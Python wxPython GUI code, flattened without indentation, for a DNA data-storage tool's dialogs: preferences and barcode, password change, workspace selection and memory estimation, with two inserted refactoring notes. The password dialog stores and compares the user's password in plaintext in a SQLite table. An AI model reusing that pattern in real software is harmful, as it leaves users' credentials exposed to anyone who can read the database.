line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Full Name :", style = wx.ALIGN_CENTRE)
self.hBoxa.Add(path,proportion = 1,flag = wx.EXPAND|wx.LEFT ,border = 5)
self.txta = wx.TextCtrl(self,name = "hBox")
self.hBoxa.Add(self.txta,proportion = 4,flag = wx.EXPAND | wx.LEFT , border = 110)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Contact Number :", style = wx.ALIGN_CENTRE)
self.hBoxc.Add(path,proportion = 1,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtc = wx.TextCtrl(self,name = "hBox")
self.hBoxc.Add(self.txtc,proportion = 2 ,flag = wx.EXPAND | wx.LEFT , border = 60)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Email Address :", style = wx.ALIGN_CENTRE)
self.hBoxd.Add(path,proportion= 1,flag = wx.EXPAND|wx.LEFT , border = 7)
self.txtd = wx.TextCtrl(self,name = "hBox")
self.hBoxd.Add(self.txtd,proportion = 3,flag = wx.EXPAND | wx.LEFT , border = 75)
self.vBox.Add(self.hBoxd, flag = wx.TOP | wx.BOTTOM, border = 7)
self.hBoxb = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = "File Name (e.g. a.png.dnac):", style = wx.ALIGN_CENTRE)
#sizer proportions must be integers; 3:4 preserves the intended 1.5:2 ratio
self.hBoxb.Add(path,proportion = 3,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtb = wx.TextCtrl(self,name = "hBox")
self.hBoxb.Add(self.txtb,proportion = 4,flag = wx.EXPAND)
self.vBox.Add(self.hBoxb , flag = wx.TOP | wx.BOTTOM , border = 7)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
try:
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
except IOError:
#"""Permission Error"""
#wx.MessageDialog(self,'Permission Denied. Please start the software in administrator mode.', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
#sys.exit(0)
shutil.copyfile(PATH + '/../icons/barcode.png',self.WORKSPACE_PATH + '/barcode/barcode.png')
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
if not os.path.isdir(self.WORKSPACE_PATH + '/.temp'):
os.mkdir(self.WORKSPACE_PATH +'/.temp')
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox.Add(self.imageCtrl,flag = wx.LEFT | wx.ALIGN_CENTER_HORIZONTAL , border = 10)
head = wx.StaticText(self ,label = PREF_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
if 'darwin' in sys.platform:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(570)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
else:
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(550)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label="Save")
self.barcodeBut = wx.Button(self,label="Generate Barcode")
self.cancelBut = wx.Button(self,label="Close")
self.hBoxe.Add(self.saveBut, flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.barcodeBut, flag = wx.RIGHT | wx.LEFT , border = 10)
self.hBoxe.Add(self.cancelBut, flag = wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxe, flag = wx.TOP | wx.ALIGN_CENTER_HORIZONTAL | wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
self.Layout()
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.barcodeBut.Bind(wx.EVT_BUTTON,self.generate)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
#self.browBut.Bind(wx.EVT_BUTTON,self.onChoose)
#self.SetSize((500,450))
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = (cur.execute('SELECT * FROM prefs where id = 1').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txta.WriteText(string)
string = (cur.execute('SELECT * FROM prefs where id = 2').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txtc.WriteText(string)
string = (cur.execute('SELECT * FROM prefs where id = 3').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txtd.WriteText(string)
if con:
con.close()
def onChoose(self,e):
locationSelector = wx.DirDialog(self,"Please select a default location to save all your files",style = wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
if locationSelector.ShowModal() == wx.ID_OK:
paths = locationSelector.GetPath()
if "win" in sys.platform:
self.savePath = paths
elif "linux" in sys.platform:
self.savePath = unicodedata.normalize('NFKD', paths).encode('ascii','ignore')
self.txtf.Clear()
self.txtf.WriteText(self.savePath)
else:
self.savePath = None
def save(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
try:
cur = con.cursor()
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txta.GetString(0,self.txta.GetLastPosition()),1))
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtc.GetString(0,self.txtc.GetLastPosition()),2))
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),3))
cur.execute('UPDATE prefs SET details = "true" WHERE id = 4')
#if not self.txtf.IsEmpty():
# cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtf.GetString(0,self.txtf.GetLastPosition()),7))
#else:
# cur.execute('UPDATE prefs SET details = "None" WHERE id = 7')
con.commit()
except sqlite3.OperationalError:
DATABASE_ERROR = True
if con:
con.close()
self.Destroy()
def generate(self,e):
barcodeGenerator.generate(self.txta.GetString(0,self.txta.GetLastPosition()) + "-" + self.txtb.GetString(0,self.txtb.GetLastPosition())+ "-" + self.txtc.GetString(0,self.txtc.GetLastPosition()) + "-" + self.txtd.GetString(0,self.txtd.GetLastPosition()),self.WORKSPACE_PATH + "/barcode/")
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl.SetBitmap(wx.BitmapFromImage(img))
self.Refresh()
def cancel(self,e):
self.Destroy()
# Dialog used to set or change the password
class setPasswordDialog(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if "win" in sys.platform and not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Please enter your password",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Old Password :\t\t")
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if string == 'false':
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_READONLY)
else:
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxa.Add(path,1,wx.EXPAND)
self.hBoxa.Add(self.txta,3,wx.EXPAND | wx.RIGHT ,border = 10)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " New Password :\t ")
self.txtc = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxc.Add(path, 1, flag = wx.EXPAND)
self.hBoxc.Add(self.txtc, 3, wx.EXPAND | wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Confirm Password : ")
self.txtd = wx.TextCtrl(self,name = "hBox1",style = wx.TE_PASSWORD)
self.hBoxd.Add(path, 1, flag = wx.EXPAND)
self.hBoxd.Add(self.txtd, 3, flag = wx.EXPAND | wx.RIGHT,border = 10)
self.vBox.Add(self.hBoxd,flag = wx.TOP | wx.BOTTOM, border = 7)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = "It is recommended that you use a password to keep your data private")
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.RIGHT , border = 5)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.cancelBut = wx.Button(self,label=" Cancel ")
self.hBoxe.Add(self.saveBut,flag = wx.RIGHT | wx.BOTTOM, border = 10)
self.hBoxe.Add(self.cancelBut,flag = wx.LEFT | wx.BOTTOM, border = 10)
self.vBox.Add(self.hBoxe, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL)
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform or 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Please enter your password",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Old Password :\t")
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
if string == 'false':
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_READONLY)
else:
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxa.Add(path,1,wx.EXPAND)
self.hBoxa.Add(self.txta,3,wx.EXPAND | wx.LEFT , border = 10)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " New Password :\t")
self.hBoxc.Add(path,proportion =1,flag = wx.EXPAND)
self.txtc = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxc.Add(self.txtc,proportion = 3 ,flag = wx.EXPAND | wx.LEFT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Confirm Password :")
self.hBoxd.Add(path,1,flag = wx.EXPAND)
self.txtd = wx.TextCtrl(self,name = "hBox1",style = wx.TE_PASSWORD)
self.hBoxd.Add(self.txtd,3,flag = wx.EXPAND)
self.vBox.Add(self.hBoxd,flag = wx.TOP | wx.BOTTOM, border = 7)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = "It is recommended that you use a password to keep your data private")
if not 'darwin' in sys.platform:
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.ALIGN_CENTER_HORIZONTAL)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.cancelBut = wx.Button(self,label=" Cancel ")
self.hBoxe.Add(self.saveBut,flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.cancelBut,flag = wx.LEFT , border = 10)
self.vBox.Add(self.hBoxe, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL)
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.SetSizer(self.vBox)
self.SetSize((570,250))
def save(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
try:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
if string == 'true':
oldPassword = (cur.execute('SELECT * FROM prefs where id = 6').fetchone())[1]
if "linux" in sys.platform:
oldPassword = unicodedata.normalize('NFKD', oldPassword).encode('ascii','ignore')
if self.txta.GetString(0,self.txta.GetLastPosition()) != oldPassword or self.txtc.GetString(0,self.txtc.GetLastPosition()) != self.txtd.GetString(0,self.txtd.GetLastPosition()):
wx.MessageBox('Your passwords do not match, or your old password is incorrect', 'Information!',wx.OK | wx.ICON_INFORMATION)
else:
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),6))
con.execute('UPDATE prefs SET details = ? WHERE id = ?',("true",5))
self.Destroy()
wx.MessageBox('Your password has been updated!', 'Information!',wx.OK |wx.ICON_INFORMATION)
else:
if self.txtc.GetString(0,self.txtc.GetLastPosition()) != self.txtd.GetString(0,self.txtd.GetLastPosition()):
wx.MessageBox('Your passwords do not match', 'Information!',wx.OK | wx.ICON_INFORMATION)
else:
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),6))
con.execute('UPDATE prefs SET details = ? WHERE id = ?',("true",5))
self.Destroy()
wx.MessageBox('Your password has been updated!', 'Information!',wx.OK |wx.ICON_INFORMATION)
con.commit()
except sqlite3.OperationalError:
DATABASE_ERROR = True
self.Destroy()
if con:
con.close()
def cancel(self,e):
self.Destroy()
# Dialog used to select encode/decode when the software starts
class chooseDialog(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
head = wx.StaticText(self ,label = "Please Select your Choice",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL, border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.encodeBut = wx.Button(self,label = "File To DNA (Encode)")
self.decodeBut = wx.Button(self,label = "DNA To File (Decode)")
self.vBox.Add(self.encodeBut,flag = wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL ,border = 10,proportion = 1)
self.vBox.Add(self.decodeBut,flag = wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL ,border = 10,proportion = 1)
self.SetSizer(self.vBox)
self.SetSize((300,150))
class workspaceLauncher(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
header = wx.TextCtrl(self,name = "hBox",size = (350,60),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(header,flag = wx.EXPAND | wx.ALL , border = 10)
header.WriteText(HEADER_TEXT)
head = wx.StaticText(self ,label = "Select your Workspace",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head, flag = wx.EXPAND | wx.TOP | wx.LEFT, border = 10)
line1 = wx.StaticLine(self, size=(350,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.cbList = []
if "win" in sys.platform and not 'darwin' in sys.platform:
con = sqlite3.connect(PATH + '/../database/workspace.db')
elif "linux" in sys.platform or 'darwin' in sys.platform:
con = sqlite3.connect(PATH + '/../database/workspace.db')
try:
cur = con.cursor()
for i in cur.execute('SELECT * FROM workspace'):
if "linux" in sys.platform:
self.cbList.append(unicodedata.normalize('NFKD', i[1]).encode('ascii','ignore'))
elif "win" in sys.platform:
self.cbList.append(i[1])
except sqlite3.Error:
LIST_ERROR = True
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
self.defaultWorkspace = cur.execute('SELECT * FROM prefs WHERE id = 7').fetchone()[1]
if "linux" in sys.platform:
self.defaultWorkspace = unicodedata.normalize('NFKD', self.defaultWorkspace).encode('ascii','ignore')
if self.defaultWorkspace == "True":
self.defaultWorkspace = True
else:
self.defaultWorkspace = False
con.close()
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.cb = wx.ComboBox(self, -1, size = (350,30), choices = self.cbList, style = wx.CB_DROPDOWN)
self.hBox.Add(self.cb, proportion = 4, flag = wx.LEFT | wx.TOP, border = 5)
self.browBut = wx.Button(self , label = "Browse")
self.hBox.Add(self.browBut, proportion = 1, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.RIGHT | wx.TOP , border = 5)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
self.defCheckBox = wx.CheckBox(self, -1, label = "Set this workspace as default and don't ask me again", style = wx.CHK_2STATE)
self.hBox1.Add(self.defCheckBox, flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 10)
self.vBox.Add(self.hBox1, proportion = 1, flag = wx.ALIGN_CENTER_VERTICAL | wx.TOP | wx.BOTTOM, border = 20)
self.defCheckBox.SetValue(self.defaultWorkspace)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
self.okBut = wx.Button(self, wx.ID_OK,size = (100,30))
self.cancelBut = wx.Button(self, wx.ID_CANCEL, size = (100,30))
self.hBox2.Add(self.okBut, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT | wx.BOTTOM, border = 10)
self.hBox2.Add(self.cancelBut, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.BOTTOM, border = 10)
self.vBox.Add(self.hBox2,flag = wx.ALIGN_CENTER)
self.SetSizerAndFit(self.vBox)
self.browBut.Bind(wx.EVT_BUTTON,self.onChoose)
self.okBut.Bind(wx.EVT_BUTTON,self.okay)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.isNew = False
self.savePath = None
#This is necessary since we don't want to close the software when the Cancel button is pressed in the SWITCH WORKSPACE case
if id == 102:
self.cancelBut.Disable()
def onChoose(self,e):
locationSelector = wx.DirDialog(self,"Please select a location to save all your files",style = wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
if locationSelector.ShowModal() == wx.ID_OK:
paths = locationSelector.GetPath()
if "win" in sys.platform:
self.savePath = paths
elif "linux" in sys.platform:
self.savePath = unicodedata.normalize('NFKD', paths).encode('ascii','ignore')
self.cb.SetValue(self.savePath)
else:
self.savePath = None
def okay(self,e):
if self.savePath is None:
if "win" in sys.platform:
if self.cb.GetValue() == "":
wx.MessageDialog(self,'Please select a folder for the workspace', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
else:
self.savePath = self.cb.GetValue()
elif "linux" in sys.platform:
if unicodedata.normalize('NFKD', self.cb.GetValue()).encode('ascii','ignore') == "":
wx.MessageDialog(self,'Please select a folder for the workspace', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
else:
self.savePath = unicodedata.normalize('NFKD', self.cb.GetValue()).encode('ascii','ignore')
if self.savePath in self.cbList:
self.isNew = False
else:
self.isNew = True
if self.defCheckBox.IsChecked():
self.defaultWorkspace = True
else:
self.defaultWorkspace = False
if "win" in sys.platform and not 'darwin' in sys.platform:
con1 = sqlite3.connect(PATH + '/../database/prefs.db')
con = sqlite3.connect(PATH + '/../database/workspace.db')
elif "linux" in sys.platform or 'darwin' in sys.platform:
con1 = sqlite3.connect(PATH + '/../database/prefs.db')
con = sqlite3.connect(PATH + '/../database/workspace.db')
try:
cur1 = con1.cursor()
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(str(self.defaultWorkspace),7))
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.savePath,8))
count = cur1.execute('SELECT * FROM prefs WHERE id = 9').fetchone()[1]
if "linux" in sys.platform:
count = unicodedata.normalize('NFKD', count).encode('ascii','ignore')
if self.isNew:
count = str(int(count) + 1)
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(count,9))
con1.commit()
except sqlite3.Error:
print("PREF_ERROR")
DB_ERROR_PREFS = True
con1.close()
if self.isNew:
try:
cur = con.cursor()
cur.execute('INSERT INTO workspace VALUES(?,?)',(int(count),self.savePath))
con.commit()
con.close()
except sqlite3.OperationalError:
cur = con.cursor()
#cur.execute('DROP TABLE IF EXISTS workspace')
cur.execute('CREATE TABLE workspace(id INT,path TEXT NOT NULL)')
cur.execute('INSERT INTO workspace VALUES(?,?)',(1,self.savePath))
con.commit()
con.close()
self.Destroy()
def cancel(self,e):
sys.exit(0)
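The NFKD-normalize-then-ASCII-encode sequence recurs on every Linux branch above. A minimal sketch of a helper that applies it only when needed; `to_ascii` is a hypothetical name (the file does not define it), and the platform check mirrors the `"linux" in sys.platform` tests used throughout:

```python
import sys
import unicodedata

# Hypothetical helper (an assumption, not in the original file): apply the
# same platform-conditional normalization the dialogs above repeat inline.
def to_ascii(text, platform=None):
    platform = platform or sys.platform
    if "linux" in platform:
        # Decompose accented characters, then drop any remaining non-ASCII.
        return unicodedata.normalize('NFKD', text).encode('ascii', 'ignore')
    return text
```

On the Linux path this returns the ASCII-encoded byte string, matching the behavior of the inline calls; on other platforms the value passes through unchanged.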
class memEstimator(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Memory Estimation",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
head = wx.StaticText(self ,label = "Memory Estimation",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(16, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a data file from your computer")
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL | wx.RIGHT,proportion = 2,border = 10)
self.vBox.Add(self.hBox)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
if not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Disclaimer: These values are approximate; the actual\nvalues may vary",style = wx.ALIGN_CENTRE_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
head = wx.StaticText(self ,label = "Disclaimer: These values are approximate; the actual\nvalues may vary",style = wx.ALIGN_CENTRE_HORIZONTAL)
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
#head.Wrap(440)
self.vBox.Add(head ,flag = wx.TOP | wx.LEFT | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.butOk = wx.Button(self , label = "OK")
self.vBox.Add(self.butOk,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.BOTTOM , border = 10)
self.SetSizerAndFit(self.vBox)
#self.SetSize((370,470))
self.butChoose.Bind(wx.EVT_BUTTON,self.onChoose)
self.butOk.Bind(wx.EVT_BUTTON,self.ok)
def onChoose(self,e):
self.txt.Clear()
fileSelector = wx.FileDialog(self, message="Choose a file",defaultFile="",style=wx.OPEN | wx.MULTIPLE | wx.CHANGE_DIR )
if fileSelector.ShowModal() == wx.ID_OK:
paths = fileSelector.GetPaths()
if "win" in sys.platform and not 'darwin' in sys.platform:
path = paths[0]
elif "linux" in sys.platform or 'darwin' in sys.platform:
path = unicodedata.normalize('NFKD', paths[0]).encode('ascii','ignore')
length = os.path.getsize(path)
dnaLength = int(5.5 * length)
dnaStringMem = 6 * length
dnaStringMem = dnaStringMem/CHUNK_SIZE
if dnaStringMem == 0:
dnaStringMem = 1
dnaListMem = (((dnaLength)/25) - 3) * 117
dnaListMem = dnaListMem/CHUNK_SIZE
if dnaListMem == 0:
dnaListMem = 1
errorCorrectionMem = 15 * length
line1 = "File Size (bytes) : \t\t" + str(length)
line2 = "Size of DNA String : \t" + str(dnaLength)
line3 = "Free Memory Required : \n" + "To generate DNA String :\t" + str(dnaStringMem) + " MB\n" + "To generate DNA Chunks :\t" + str(dnaListMem) + " MB\n"
line4 = "Amount of DNA Required : \t" + str(length / (455 * (10.0 ** 18)))
text = line1 + "\n\n" + line2 + "\n\n" + line3 + "\n\n" + line4 + " grams\n\n" + "File Selected : " + path
self.txt.WriteText(text)
fileSelector.Destroy()
def ok(self,e):
self.Destroy()
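The arithmetic in memEstimator.onChoose can be isolated in a pure function, which makes the estimates testable without a GUI. This is a sketch under assumptions: `estimate_memory` is a hypothetical name, `chunk_size` stands in for the module-level CHUNK_SIZE constant defined elsewhere in this file, and the result is clamped to at least 1 MB as the original does for the zero case:

```python
# Hypothetical pure version (an assumption) of the estimate computed in
# memEstimator.onChoose. Uses floor division to match the Python 2 int math.
def estimate_memory(length, chunk_size):
    dna_length = int(5.5 * length)                         # encoded DNA string length
    dna_string_mem = max((6 * length) // chunk_size, 1)    # MB needed for the DNA string
    dna_list_mem = max(((dna_length // 25) - 3) * 117 // chunk_size, 1)  # MB for chunks
    return dna_length, dna_string_mem, dna_list_mem
```

The dialog would then only format the returned numbers, keeping the sizing formulae in one place.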
class estimator(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if "win" in sys.platform and not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Biochemical Property Estimator",style = wx.ALIGN_CENTER_HORIZONTAL)
